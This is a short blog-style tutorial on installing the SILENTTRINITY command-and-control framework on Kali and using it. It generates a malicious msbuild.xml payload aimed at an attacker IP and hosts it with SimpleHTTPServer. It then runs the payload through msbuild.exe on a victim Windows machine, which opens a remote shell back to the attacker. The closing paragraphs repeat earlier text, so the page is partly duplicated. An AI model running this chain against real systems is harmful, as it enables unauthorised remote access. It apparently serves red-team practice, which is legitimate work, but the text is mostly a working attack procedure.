Below I'll go through a quick example of installing it and running the most basic agent. I will update this as I mess with ST more. But for now, let's just go over the most basics. Let's begin.
Install
The installation of SILENTTRINITY (or ST) is fairly straight forward and easy. Here's the steps I took in order to get it up and running on my Kali host.
Below is a link to ST Github:
There's also the same instructions listed on the ST Wiki:
We first need to make sure that Python 3.7.0 is installed. Here's a link to the python 3 documentation:
Once we have Python 3.7.0 installed, it's time to install Mono.
When installing Mono, I followed the Debian 9 instructions. I also had to install xsp4 and gtk-sharp2 manually:
apt-get install mono-xsp4
apt-get install gtk-sharp2
make clean
Once complete, verify Mono works by following mono Basics:
https://www.mono-project.com/docs/getting-started/mono-basics/
Once Mono is installed, install IronPython. Download the appropriate .deb file and install:
https://github.com/IronLanguages/ironpython2/releases
dpk -i <debFile>
After that, it's time to download download SILENTTRINITY:
cd /opt/ git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
Navigate to the SILENTTRINITY/server directory and install the requirements:
pip3 install -r requirements.txt
There may be times where some of the requirements don't install. Just install then manually. For example, hypercorn didn't install correctly for me, so I installed it:
git clone https://github.com/pgjones/hypercorn.git cd hypercorn python3.7 setup.py install
Once all the requirements are complete, you can begin by running ST.
Running SILENTTRINITY
In it's most basic form, we can create a msbuild.xml file that we will use to create our agent.
We first navigate to our ST server directory:
cd /opt/SILENTTRINITY/Server
We then generate our malicious xml file:
python3.7 stvenom.py msbuild http 8090 -ip <attackerIP>
We then run ST and reference our build file that will open up a listener on port 8090:
Next, open a new terminal and go to the same directory where msbuild.xml is. Host the file using something like python's SimpleHTTPServer:
With your malicious file hosted and ST ready for the exploit, we then go to the victim machine and download the msbuild.xml file. Simply just open a browser, navigate to attacker IP and port 8080 and download msbuild.xml.
Once the xml file is downloaded, we can run the file:
At this point, look in your attacker machines ST instance and you should now have a shell!
Hope this has been helpful.
Until next time.
python3.7 st.py -r msbuild.res
Next, open a new terminal and go to the same directory where msbuild.xml is. Host the file using something like python's SimpleHTTPServer:
python -m SimpleHTTPServer 8080
With your malicious file hosted and ST ready for the exploit, we then go to the victim machine and download the msbuild.xml file. Simply just open a browser, navigate to attacker IP and port 8080 and download msbuild.xml.
Once the xml file is downloaded, we can run the file:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
At this point, look in your attacker machines ST instance and you should now have a shell!
Hope this has been helpful.
Until next time.